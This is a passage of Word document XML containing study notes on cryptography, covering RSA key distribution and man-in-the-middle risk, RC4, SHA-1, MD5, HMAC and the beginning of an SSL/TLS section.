        <w:t>As with all ciphers, how RSA public keys are distributed is important to security. Key distribution must be secured against a man-in-the-middle attack. Suppose Eve has some way to give Bob arbitrary keys and make him believe they belong to Alice. Suppose further that Eve can intercept transmissions between Alice and Bob. Eve sends Bob her own public key, which Bob believes to be Alice's. Eve can then intercept any ciphertext sent by Bob, decrypt it with her own private key, keep a copy of the message, encrypt the message with Alice's public key, and send the new ciphertext to Alice. In principle, neither Alice nor Bob would be able to detect Eve's presence. Defenses against such attacks are often based on digital certificates or other components</w:t>
      </w:r>
      <w:r w:rsidR="00817C7B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a public key infrastructure such as trusted CAs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00723565" w:rsidRDefault="00723565" w:rsidP="00723565">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E00A6A" w:rsidRPr="00E91BAD" w:rsidRDefault="00E00A6A" w:rsidP="00723565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RC4:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E00A6A" w:rsidRPr="00E91BAD" w:rsidRDefault="00E00A6A" w:rsidP="00E91BAD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>One of the most widely-used software stream cipher and is used in popular protocols such as Secure Sockets Layer (SSL) (to protect Internet traffic) and WEP (to secure wireless networks). While remarkable for its simplicity and speed in software, RC4 has weaknesses that argue against its use in new systems. It is especially vulnerable when the beginning of the output keystream is not discarded, nonrandom or related keys are used, or a single keystream is used twice; some ways of using RC4 can lead to very insecure cryptosystems such as WEP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E00A6A" w:rsidRPr="00E91BAD" w:rsidRDefault="00E00A6A" w:rsidP="00E91BAD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RC4 generates a pseudorandom stream of bits (a keystream) which, for encryption, is combined with the plaintext using bit-wise exclusive-or; decryption is performed the same way (since exclusive-or is a symmetric operation). To generate the keystream, the cipher makes use of a secret internal state which consists of two parts: A permutation of all 256 poss</w:t>
      </w:r>
      <w:r w:rsidR="008F21F6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ible bytes and t</w:t>
      </w:r>
      <w:r w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wo 8-bit index-pointers. The permutation is initialized with a variable length key, typically between 40 and 256 bits, using the key-scheduling algorithm (KSA). Once this has been completed, the stream of bits is generated using the pseudo-random generation algorithm (PRGA).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E00A6A" w:rsidRPr="00E91BAD" w:rsidRDefault="00E91BAD" w:rsidP="00E91BAD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Unlike more</w:t>
      </w:r>
      <w:r w:rsidR="00E00A6A" w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> modern stream cipher, RC4 does not take a separate nonce alongside the key. This means that if a single long-term key is to be used to securely encrypt multiple streams, the cryptosystem must specify how to combine the nonce and the long-term key to generate the stream key for RC4. One approach to addressing this is to generate a "fresh" RC4 key by hashing a long-term key with a nonce. However, many applications that use RC4 simply concatenate key and nonce; RC4's weak key schedule then gives rise to a variety of serious problems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRPr="0011775E" w:rsidRDefault="00CE7A90" w:rsidP="0011775E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B11d - </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE7A90">
        <w:t>Hashes: SHA1 and MD5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E91BAD" w:rsidRPr="0011775E" w:rsidRDefault="00E91BAD" w:rsidP="0011775E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011775E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A cryptographic hash function is a deterministic procedure that takes an arbitrary block of data and returns a fixed-size bit string, the (cryptographic) hash value, such that an accidental or intentional change to the data will change the hash value. The data to be encoded is often called the "</w:t>
      </w:r>
      <w:r w:rsidR="009A7BE6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">message", and the hash value is often </w:t>
      </w:r>
      <w:r w:rsidR="009A7BE6" w:rsidRPr="0011775E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>referred</w:t>
      </w:r>
      <w:r w:rsidR="009A7BE6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to as </w:t>
      </w:r>
      <w:r w:rsidRPr="0011775E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>the message digest or simply digest.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E91BAD" w:rsidRPr="0011775E" w:rsidRDefault="00E91BAD" w:rsidP="0011775E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011775E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The ideal cryptographic hash function has four main or significant properties:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E91BAD" w:rsidRPr="00E91BAD" w:rsidRDefault="00E91BAD" w:rsidP="0011775E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">it is easy to compute the hash value for any given message, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E91BAD" w:rsidRPr="00E91BAD" w:rsidRDefault="00E91BAD" w:rsidP="0011775E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">it is infeasible to find a message that has a given hash, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E91BAD" w:rsidRPr="00E91BAD" w:rsidRDefault="00E91BAD" w:rsidP="0011775E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">it is infeasible to modify a message without changing its hash, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E91BAD" w:rsidRDefault="00E91BAD" w:rsidP="0011775E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is infeasible to find two different messages with the same hash.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E91BAD" w:rsidRDefault="00E91BAD" w:rsidP="00E91BAD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E91BAD" w:rsidRPr="0011775E" w:rsidRDefault="00E91BAD" w:rsidP="00E91BAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011775E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SHA1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E91BAD" w:rsidRPr="00E91BAD" w:rsidRDefault="008F21F6" w:rsidP="00E91BAD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Secure Hash Algorithm 1</w:t>
      </w:r>
      <w:r w:rsidR="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00E91BAD" w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SHA-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00E91BAD" w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> produces a 160-bit digest from a message with a maximum length of (2</w:t>
      </w:r>
      <w:r w:rsidR="00E91BAD" w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="00E91BAD" w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> − 1) bits.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E91BAD" w:rsidRDefault="00E91BAD" w:rsidP="00E91BAD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SHA-1 forms part of several widely-used security applications and protocols, including TLS and SSL, PGP, SSH, S/MIME, and IPsec.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E91BAD" w:rsidRDefault="008F21F6" w:rsidP="00E91BAD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Published</w:t>
      </w:r>
      <w:r w:rsidR="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00E91BAD" w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ttacks can find collisions in the full version of SHA-1, requiring fewer than 2</w:t>
      </w:r>
      <w:r w:rsidR="00E91BAD" w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>69</w:t>
      </w:r>
      <w:r w:rsidR="00E91BAD" w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations. (A brute-force search would require 2</w:t>
      </w:r>
      <w:r w:rsidR="00E91BAD" w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r w:rsidR="00E91BAD" w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E91BAD" w:rsidRDefault="00E91BAD" w:rsidP="00E91BAD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sha1sum</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E91BAD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a computer program that calculates and verifies SHA-1 hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E91BAD" w:rsidRDefault="00E91BAD" w:rsidP="00E91BAD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E91BAD" w:rsidRPr="0011775E" w:rsidRDefault="00E91BAD" w:rsidP="00E91BAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011775E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MD5:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0011775E" w:rsidRPr="0011775E" w:rsidRDefault="00E91BAD" w:rsidP="0011775E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011775E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>MD5 (Message-Digest algorithm 5) is a widely used cryptographic hash function with a 128-bit hash value.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E91BAD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0011775E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MD5 has been employed in a wide variety of security applications, and is also commonly used to check the integrity of files. However, it has been shown that MD</w:t>
      </w:r>
      <w:r w:rsidR="0011775E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5 is not collision resistant;</w:t>
      </w:r>
      <w:r w:rsidRPr="0011775E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> as such, MD5 is not suitable for applications like SSL certificates or digital signatures that rely on this property. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E91BAD" w:rsidRPr="0011775E" w:rsidRDefault="00E91BAD" w:rsidP="0011775E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011775E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>An MD5 hash is typically expressed as a 32-digit hexadecimal number.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E91BAD" w:rsidRPr="0011775E" w:rsidRDefault="0011775E" w:rsidP="0011775E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011775E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The security of the MD5 hash function is severely compromised. A collision attack exists that can find collisions within seconds on a regular computer. Further, there is also a chosen-prefix collision attack that can produce a collision for two chosen arbitrarily different inputs, within hours on a single regular computer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E91BAD" w:rsidRPr="007B1FEB" w:rsidRDefault="0011775E" w:rsidP="00E91BAD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011775E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A number of projects have published MD5 rainbow tables online, that can be used to reverse many MD5 hashes into strings that collide with the original input, usually for the purposes of password cracking. The use of MD5 in some websites' URLs means that search engines such as Google can also sometimes function as a limited tool for reverse lookup of MD5 hashes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRDefault="00CE7A90" w:rsidP="00CE7A90">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B11e - </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE7A90">
        <w:t>Message Integrity codes: HMAC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0011775E" w:rsidRPr="0011775E" w:rsidRDefault="0011775E" w:rsidP="0011775E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011775E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">In cryptography, HMAC (Hash-based Message Authentication Code), is a specific construction for calculating a message authentication code (MAC) involving a cryptographic hash function in combination with a secret key. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0011775E" w:rsidRPr="0011775E" w:rsidRDefault="0011775E" w:rsidP="0011775E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011775E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A message authentication code (often MAC) is a short piece of information used to authenticate a message. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0011775E" w:rsidRPr="0011775E" w:rsidRDefault="0011775E" w:rsidP="0011775E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011775E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">As with any MAC, it may be used to simultaneously verify both the data integrity and the authenticity of a message. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0011775E" w:rsidRPr="0011775E" w:rsidRDefault="0011775E" w:rsidP="0011775E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011775E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Any iterative cryptographic hash function, such as MD5 or SHA-1, may be used in the calculation of an HMAC; the resulting MAC algorithm is termed HMAC-MD5 or HMAC-SHA1 accordingly. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0011775E" w:rsidRPr="0011775E" w:rsidRDefault="0011775E" w:rsidP="0011775E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011775E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The cryptographic strength of the HMAC depends upon the cryptographic strength of the underlying hash function, the size of its hash output length in bits and on the size and quality of the cryptographic key. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRDefault="00CE7A90" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008876A5" w:rsidRPr="008876A5" w:rsidRDefault="008876A5" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>B12 -</w:t>
      </w:r>
      <w:r w:rsidRPr="008876A5">
        <w:t>Application of Cryptography</w:t>
      </w:r>
      <w:r w:rsidRPr="008876A5">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008876A5" w:rsidRPr="008876A5" w:rsidRDefault="008876A5" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B12a - </w:t>
      </w:r>
      <w:r w:rsidRPr="008876A5">
        <w:t>SSL, IPsec, SSH, PGP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008876A5" w:rsidRPr="00576AAB" w:rsidRDefault="007B1FEB" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00576AAB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SSL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B1FEB" w:rsidRPr="00576AAB" w:rsidRDefault="007B1FEB" w:rsidP="00576AAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00576AAB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Secure Socket Layer (SSL), and it successor TLS, are cryptographic protocols that provide security for communications over networks such as the Internet. TLS and SSL encrypt the segments of network connections at the Transport Layer end-to-end.</w:t>
      </w:r>
      <w:r w:rsidR="00817C7B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B1FEB" w:rsidRDefault="007B1FEB" w:rsidP="00576AAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00576AAB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SSL/TLS protocol allows client/server applications to communicate across a network in a way designed to prevent eavesdropping and tampering. They provide endpoint </w:t>
      </w:r>
      <w:r w:rsidR="00817C7B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">identity verification, </w:t>
      </w:r>
      <w:r w:rsidRPr="00576AAB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>authentication</w:t>
      </w:r>
      <w:r w:rsidR="00817C7B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00576AAB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and communications confidentiality over the Internet using cryptography</w:t>
      </w:r>
      <w:r w:rsidR="00576AAB" w:rsidRPr="00576AAB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00080968" w:rsidRDefault="00080968" w:rsidP="00576AAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817C7B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>In applications design, TLS is usually implemented on top of any of the Transport Layer protocols, encapsulating the application-specific protocols such as HTTP, FTP, SMTP, NNTP, and XMPP.</w:t>
      </w:r>
